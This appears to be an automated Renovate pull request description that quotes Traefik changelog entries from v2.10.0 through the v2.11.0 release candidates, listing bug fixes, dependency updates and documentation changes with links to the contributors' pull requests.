- **\[ecs]** Mention ECS as supported backend ([#10393](https://togithub.com/traefik/traefik/pull/10393) by [aleyrizvi](https://togithub.com/aleyrizvi))
- **\[k8s/crd]** Adjust deprecation notice for Kubernetes CRD provider ([#10317](https://togithub.com/traefik/traefik/pull/10317) by [rtribotte](https://togithub.com/rtribotte))
- **\[middleware]** Update the documentation for RateLimit to provide a better example ([#10298](https://togithub.com/traefik/traefik/pull/10298) by [rmburton](https://togithub.com/rmburton))
- **\[server]** Fix the keepAlive options for the CLI examples ([#10398](https://togithub.com/traefik/traefik/pull/10398) by [immanuelfodor](https://togithub.com/immanuelfodor))
- Prepare release v2.11.0-rc2 ([#10384](https://togithub.com/traefik/traefik/pull/10384) by [rtribotte](https://togithub.com/rtribotte))
- Improve Concepts documentation page ([#10315](https://togithub.com/traefik/traefik/pull/10315) by [oliver-dvorski](https://togithub.com/oliver-dvorski))
- Prepare release v2.11.0-rc1 ([#10326](https://togithub.com/traefik/traefik/pull/10326) by [mmatur](https://togithub.com/mmatur))
- Fix description for anonymous usage statistics references ([#10287](https://togithub.com/traefik/traefik/pull/10287) by [ariyonaty](https://togithub.com/ariyonaty))
- Documentation enhancements ([#10261](https://togithub.com/traefik/traefik/pull/10261) by [svx](https://togithub.com/svx))

### [`v2.10.7`](https://togithub.com/traefik/traefik/blob/HEAD/CHANGELOG.md#v2107-2023-12-06)
[Compare Source](https://togithub.com/traefik/traefik/compare/v2.10.6...v2.10.7)

[All Commits](https://togithub.com/traefik/traefik/compare/v2.10.6...v2.10.7)

**Bug fixes:**

- **\[logs]** Fixed datadog logs json format issue ([#10233](https://togithub.com/traefik/traefik/pull/10233) by [sssash18](https://togithub.com/sssash18))

### [`v2.10.6`](https://togithub.com/traefik/traefik/blob/HEAD/CHANGELOG.md#v2106-2023-11-28)

[Compare Source](https://togithub.com/traefik/traefik/compare/v2.10.5...v2.10.6)

[All Commits](https://togithub.com/traefik/traefik/compare/v2.10.5...v2.10.6)

**Bug fixes:**

- **\[acme]** Remove backoff for http challenge ([#10224](https://togithub.com/traefik/traefik/pull/10224) by [youkoulayley](https://togithub.com/youkoulayley))
- **\[consul,consulcatalog]** Update github.com/hashicorp/consul/api ([#10220](https://togithub.com/traefik/traefik/pull/10220) by [kevinpollet](https://togithub.com/kevinpollet))
- **\[http3]** Update quic-go to v0.39.1 ([#10171](https://togithub.com/traefik/traefik/pull/10171) by [tomMoulard](https://togithub.com/tomMoulard))
- **\[middleware]** Fix stripPrefix middleware is not applied to retried attempts ([#10255](https://togithub.com/traefik/traefik/pull/10255) by [niki-timofe](https://togithub.com/niki-timofe))
- **\[provider]** Refuse recursive requests ([#10242](https://togithub.com/traefik/traefik/pull/10242) by [rtribotte](https://togithub.com/rtribotte))
- **\[server]** Deny request with fragment in URL path ([#10229](https://togithub.com/traefik/traefik/pull/10229) by [lbenguigui](https://togithub.com/lbenguigui))
- **\[tracing]** Remove deprecated code usage for datadog tracer ([#10196](https://togithub.com/traefik/traefik/pull/10196) by [mmatur](https://togithub.com/mmatur))

**Documentation:**

- **\[governance]** Update the review process and maintainers team documentation ([#10230](https://togithub.com/traefik/traefik/pull/10230) by [geraldcroes](https://togithub.com/geraldcroes))
- **\[governance]**
Guidelines Update ([#10197](https://togithub.com/traefik/traefik/pull/10197) by [geraldcroes](https://togithub.com/geraldcroes))
- **\[metrics]** Add a mention for the host header in metrics headers labels doc ([#10172](https://togithub.com/traefik/traefik/pull/10172) by [rtribotte](https://togithub.com/rtribotte))
- **\[middleware]** Rephrase BasicAuth and DigestAuth docs ([#10226](https://togithub.com/traefik/traefik/pull/10226) by [sssash18](https://togithub.com/sssash18))
- **\[middleware]** Improve ErrorPages examples ([#10209](https://togithub.com/traefik/traefik/pull/10209) by [arendhummeling](https://togithub.com/arendhummeling))
- Add [@lbenguigui](https://togithub.com/lbenguigui) to maintainers ([#10222](https://togithub.com/traefik/traefik/pull/10222) by [kevinpollet](https://togithub.com/kevinpollet))

### [`v2.10.5`](https://togithub.com/traefik/traefik/blob/HEAD/CHANGELOG.md#v2105-2023-10-11)

[Compare Source](https://togithub.com/traefik/traefik/compare/v2.10.4...v2.10.5)

[All Commits](https://togithub.com/traefik/traefik/compare/v2.10.4...v2.10.5)

**Bug fixes:**

- **\[accesslogs]** Move origin fields capture to service level ([#10126](https://togithub.com/traefik/traefik/pull/10126) by [rtribotte](https://togithub.com/rtribotte))
- **\[accesslogs]** Fix preflight response status in access logs ([#10142](https://togithub.com/traefik/traefik/pull/10142) by [rtribotte](https://togithub.com/rtribotte))
- **\[acme]** Update go-acme/lego to v4.14.0 ([#10087](https://togithub.com/traefik/traefik/pull/10087) by [ldez](https://togithub.com/ldez))
- **\[acme]** Update go-acme/lego to v4.13.3 ([#10077](https://togithub.com/traefik/traefik/pull/10077) by [ldez](https://togithub.com/ldez))
- **\[http3]** Update quic-go to v0.37.5 ([#10083](https://togithub.com/traefik/traefik/pull/10083) by [ldez](https://togithub.com/ldez))
- **\[http3]** Update quic-go to v0.39.0 ([#10137](https://togithub.com/traefik/traefik/pull/10137) by [ldez](https://togithub.com/ldez))
- **\[http3]** Update quic-go to v0.37.6 ([#10085](https://togithub.com/traefik/traefik/pull/10085) by [ldez](https://togithub.com/ldez))
- **\[http3]** Update quic-go to v0.38.0 ([#10086](https://togithub.com/traefik/traefik/pull/10086) by [ldez](https://togithub.com/ldez))
- **\[http3]** Update quic-go to v0.38.1 ([#10090](https://togithub.com/traefik/traefik/pull/10090) by [ldez](https://togithub.com/ldez))
- **\[kv]** Ignore ErrKeyNotFound error for the KV provider ([#10082](https://togithub.com/traefik/traefik/pull/10082) by [sunyakun](https://togithub.com/sunyakun))
- **\[middleware,authentication]** Adjust forward auth to avoid connection leak ([#10096](https://togithub.com/traefik/traefik/pull/10096) by [wdhongtw](https://togithub.com/wdhongtw))
- **\[middleware,server]** Improve CNAME flattening to avoid unnecessary error logging ([#10128](https://togithub.com/traefik/traefik/pull/10128) by [niallnsec](https://togithub.com/niallnsec))
- **\[middleware]** Allow X-Forwarded-For delete operation ([#10132](https://togithub.com/traefik/traefik/pull/10132) by [rtribotte](https://togithub.com/rtribotte))
- **\[server]** Update x/net and grpc/grpc-go ([#10161](https://togithub.com/traefik/traefik/pull/10161) by [rtribotte](https://togithub.com/rtribotte))
- **\[webui]** Add missing accessControlAllowOriginListRegex to middleware view ([#10157](https://togithub.com/traefik/traefik/pull/10157) by [DBendit](https://togithub.com/DBendit))
- Fix false positive in url anonymization ([#10138](https://togithub.com/traefik/traefik/pull/10138) by [jspdown](https://togithub.com/jspdown))

**Documentation:**

- **\[acme]** Change Arvancloud URL ([#10115](https://togithub.com/traefik/traefik/pull/10115) by [sajjadjafaribojd](https://togithub.com/sajjadjafaribojd))
- **\[acme]** Correct minor typo in crd-acme docs ([#10067](https://togithub.com/traefik/traefik/pull/10067) by [ayyron-lmao](https://togithub.com/ayyron-lmao))
- **\[healthcheck]** Remove healthcheck interval
configuration warning ([#10068](https://togithub.com/traefik/traefik/pull/10068) by [rtribotte](https://togithub.com/rtribotte))
- **\[kv,redis]** Docs describe the missing db parameter in redis provider ([#10052](https://togithub.com/traefik/traefik/pull/10052) by [tokers](https://togithub.com/tokers))
- **\[middleware]** Doc fix accessControlAllowHeaders examples ([#10121](https://togithub.com/traefik/traefik/pull/10121) by [ebuildy](https://togithub.com/ebuildy))
- Updates business callout in the documentation ([#10122](https://togithub.com/traefik/traefik/pull/10122) by [tomatokoolaid](https://togithub.com/tomatokoolaid))

### [`v2.10.4`](https://togithub.com/traefik/traefik/blob/HEAD/CHANGELOG.md#v2104-2023-07-24)

[Compare Source](https://togithub.com/traefik/traefik/compare/v2.10.3...v2.10.4)

[All Commits](https://togithub.com/traefik/traefik/compare/v2.10.3...v2.10.4)

**Bug fixes:**

- **\[acme]** Update go-acme/lego to v4.13.2 ([#10036](https://togithub.com/traefik/traefik/pull/10036) by [ldez](https://togithub.com/ldez))
- **\[acme]** Update go-acme/lego to v4.13.0 ([#10029](https://togithub.com/traefik/traefik/pull/10029) by [ldez](https://togithub.com/ldez))
- **\[k8s/ingress,k8s]** fix: avoid panic on resource backends ([#10023](https://togithub.com/traefik/traefik/pull/10023) by [ldez](https://togithub.com/ldez))
- **\[middleware,tracing,plugins]** fix: traceability of the middleware plugins ([#10028](https://togithub.com/traefik/traefik/pull/10028) by [ldez](https://togithub.com/ldez))

**Documentation:**

- Update maintainers guidelines ([#9981](https://togithub.com/traefik/traefik/pull/9981) by [geraldcroes](https://togithub.com/geraldcroes))
- Update release documentation ([#9975](https://togithub.com/traefik/traefik/pull/9975) by [rtribotte](https://togithub.com/rtribotte))

**Misc:**

- **\[webui]** Updates the Hub tooltip content using a web component and adds an option to disable Hub button ([#10008](https://togithub.com/traefik/traefik/pull/10008)
by [mdeliatf](https://togithub.com/mdeliatf))

### [`v2.10.3`](https://togithub.com/traefik/traefik/blob/HEAD/CHANGELOG.md#v2103-2023-06-17)

[Compare Source](https://togithub.com/traefik/traefik/compare/v2.10.2...v2.10.3)

[All Commits](https://togithub.com/traefik/traefik/compare/v2.10.2...v2.10.3)

**Bug fixes:**

- **\[acme]** Update go-acme/lego to v4.12.2 ([#9935](https://togithub.com/traefik/traefik/pull/9971) by [ldez](https://togithub.com/ldez))

### [`v2.10.2`](https://togithub.com/traefik/traefik/blob/HEAD/CHANGELOG.md#v2102-2023-06-17)

[Compare Source](https://togithub.com/traefik/traefik/compare/v2.10.1...v2.10.2)

[All Commits](https://togithub.com/traefik/traefik/compare/v2.10.1...v2.10.2)

**Bug fixes:**

- **\[acme]** Update go-acme/lego to v4.12.1 ([#9935](https://togithub.com/traefik/traefik/pull/9935) by [ldez](https://togithub.com/ldez))
- **\[acme]** Update go-acme/lego to v4.12.0 ([#9918](https://togithub.com/traefik/traefik/pull/9918) by [ldez](https://togithub.com/ldez))
- **\[acme]** Update go-acme/lego to v4.11.0 ([#9883](https://togithub.com/traefik/traefik/pull/9883) by [ldez](https://togithub.com/ldez))
- **\[acme]** Do not check for wildcard domains for non DNS challenge ([#9881](https://togithub.com/traefik/traefik/pull/9881) by [erkexzcx](https://togithub.com/erkexzcx))
- **\[k8s/crd]** Fix multiple subsets endpoint ([#9914](https://togithub.com/traefik/traefik/pull/9914) by [joaosilva15](https://togithub.com/joaosilva15))
- **\[k8s/ingress,k8s/crd,k8s,hub]** Clean code related to Hub ([#9894](https://togithub.com/traefik/traefik/pull/9894) by [ldez](https://togithub.com/ldez))
- **\[metrics]** Enable Prometheus provider cleanup when only the router's metrics level is activated ([#9887](https://togithub.com/traefik/traefik/pull/9887) by [rtribotte](https://togithub.com/rtribotte))
- **\[middleware]** Encode query semicolons ([#9943](https://togithub.com/traefik/traefik/pull/9943) by [LandryBe](https://togithub.com/LandryBe))
- **\[middleware]** Missing trailer with custom errors middleware ([#9942](https://togithub.com/traefik/traefik/pull/9942) by [rtribotte](https://togithub.com/rtribotte))
- **\[middleware]** Support informational headers in middlewares redefining the response writer. ([#9938](https://togithub.com/traefik/traefik/pull/9938) by [rtribotte](https://togithub.com/rtribotte))
- **\[plugins]** Improve error messages related to plugins ([#9924](https://togithub.com/traefik/traefik/pull/9924) by [ldez](https://togithub.com/ldez))
- **\[tracing]** Update DataDog tracing dependency to v1.50.1 ([#9953](https://togithub.com/traefik/traefik/pull/9953) by [der-eismann](https://togithub.com/der-eismann))

**Documentation:**

- **\[accesslogs]** Fix over-indented yaml configuration of access logs ([#9930](https://togithub.com/traefik/traefik/pull/9930) by [ufUNnxagpM](https://togithub.com/ufUNnxagpM))
- **\[tls]** Add FAQ documentation about TLS certificates ([#9868](https://togithub.com/traefik/traefik/pull/9868) by [rtribotte](https://togithub.com/rtribotte))
- Fix typo ([#9966](https://togithub.com/traefik/traefik/pull/9966) by [green1052](https://togithub.com/green1052))
- Add business callouts ([#9940](https://togithub.com/traefik/traefik/pull/9940) by [tomatokoolaid](https://togithub.com/tomatokoolaid))
- Add logo for GitHub dark mode ([#9890](https://togithub.com/traefik/traefik/pull/9890) by [ldez](https://togithub.com/ldez))

### [`v2.10.1`](https://togithub.com/traefik/traefik/blob/HEAD/CHANGELOG.md#v2101-2023-04-27)

[Compare Source](https://togithub.com/traefik/traefik/compare/v2.10.0...v2.10.1)

[All Commits](https://togithub.com/traefik/traefik/compare/v2.10.0...v2.10.1)

**Bug fixes:**

- **\[middleware,oxy]** Update vulcand/oxy to [`be5cf38`](https://togithub.com/traefik/traefik/commit/be5cf38) ([#9874](https://togithub.com/traefik/traefik/pull/9874) by [rtribotte](https://togithub.com/rtribotte))

**Documentation:**

- Fix v2.10 migration guide
([#9863](https://togithub.com/traefik/traefik/pull/9863) by [rtribotte](https://togithub.com/rtribotte))

### [`v2.10.0`](https://togithub.com/traefik/traefik/blob/HEAD/CHANGELOG.md#v2100-2023-04-24)

[Compare Source](https://togithub.com/traefik/traefik/compare/v2.9.10...v2.10.0)

[All Commits](https://togithub.com/traefik/traefik/compare/v2.9.0-rc1...v2.10.0)

**Enhancements:**

- **\[docker]** Expose ContainerName in Docker provider ([#9770](https://togithub.com/traefik/traefik/pull/9770) by [quinot](https://togithub.com/quinot))
- **\[hub]** Remove hub configuration out of experimental ([#9792](https://togithub.com/traefik/traefik/pull/9792) by [mpl](https://togithub.com/mpl))
- **\[k8s/crd]** Introduce traefik.io API Group CRDs ([#9765](https://togithub.com/traefik/traefik/pull/9765) by [rtribotte](https://togithub.com/rtribotte))
- **\[k8s/ingress,k8s/crd,k8s]** Native Kubernetes service load-balancing ([#9740](https://togithub.com/traefik/traefik/pull/9740) by [rtribotte](https://togithub.com/rtribotte))
- **\[middleware,metrics]** Add prometheus metric requests_total with headers ([#9783](https://togithub.com/traefik/traefik/pull/9783) by [rtribotte](https://togithub.com/rtribotte))
- **\[nomad]** Support multiple namespaces in the Nomad Provider ([#9794](https://togithub.com/traefik/traefik/pull/9794) by [rtribotte](https://togithub.com/rtribotte))
- **\[tracing]** Add support to send DataDog traces via Unix Socket ([#9714](https://togithub.com/traefik/traefik/pull/9714) by [der-eismann](https://togithub.com/der-eismann))
- **\[webui]** Modify the Hub Button ([#9851](https://togithub.com/traefik/traefik/pull/9851) by [mdeliatf](https://togithub.com/mdeliatf))
- **\[webui]** Display period setting of the RateLimit middleware in the webui ([#9822](https://togithub.com/traefik/traefik/pull/9822) by [smatyas](https://togithub.com/smatyas))

**Bug fixes:**

- **\[docker]** Only warn about missing docker network when network_mode is not host or container
([#9799](https://togithub.com/traefik/traefik/pull/9799) by [sentriz](https://togithub.com/sentriz))
- **\[k8s/ingress,k8s]** Bump k8s.io/client-go from v0.22.1 to v0.26.3 ([#9808](https://togithub.com/traefik/traefik/pull/9808) by [ldez](https://togithub.com/ldez))
- **\[plugins]** Improve DeepCopy of PluginConf ([#9846](https://togithub.com/traefik/traefik/pull/9846) by [ldez](https://togithub.com/ldez))
- **\[plugins]** Update Yaegi to v0.15.1 ([#9815](https://togithub.com/traefik/traefik/pull/9815) by [ldez](https://togithub.com/ldez))
- **\[server]** Update vulcand/oxy to [`03de175`](https://togithub.com/traefik/traefik/commit/03de175b3822) ([#9849](https://togithub.com/traefik/traefik/pull/9849) by [longit644](https://togithub.com/longit644))

**Documentation:**

- Prepare release v2.10.0-rc1 ([#9802](https://togithub.com/traefik/traefik/pull/9802) by [ldez](https://togithub.com/ldez))
- Fix order of log levels ([#9791](https://togithub.com/traefik/traefik/pull/9791) by [svx](https://togithub.com/svx))
- **\[docker]** Update wording - add link descriptions ([#9816](https://togithub.com/traefik/traefik/pull/9816) by [svx](https://togithub.com/svx))
- **\[middleware]** Add accessControlAllowHeaders example ([#9810](https://togithub.com/traefik/traefik/pull/9810) by [yingshaoxo](https://togithub.com/yingshaoxo))
- **\[tls]** More details on Kubernetes options for mTLS ([#9835](https://togithub.com/traefik/traefik/pull/9835) by [mloiseleur](https://togithub.com/mloiseleur))
- Prepare release v2.10.0-rc2 ([#9830](https://togithub.com/traefik/traefik/pull/9830) by [mpl](https://togithub.com/mpl))
- Update Call To Actions ([#9824](https://togithub.com/traefik/traefik/pull/9824) by [svx](https://togithub.com/svx))
- Improve concepts page ([#9813](https://togithub.com/traefik/traefik/pull/9813) by [svx](https://togithub.com/svx))
- Update wording ([#9811](https://togithub.com/traefik/traefik/pull/9811) by [svx](https://togithub.com/svx))

**Misc:**

- Merge branch v2.9
into v2.10 ([#9798](https://togithub.com/traefik/traefik/pull/9798) by [ldez](https://togithub.com/ldez))
- Merge branch v2.9 into v2.10 ([#9829](https://togithub.com/traefik/traefik/pull/9829) by [mpl](https://togithub.com/mpl))

Configuration
📅 Schedule: Branch creation - "" (UTC), Automerge - At any time (no schedule defined).
🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.
♻ Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.
🔕 Ignore: Close this PR and you won't be reminded about this update again.
This PR was generated by Mend Renovate. View the repository job log.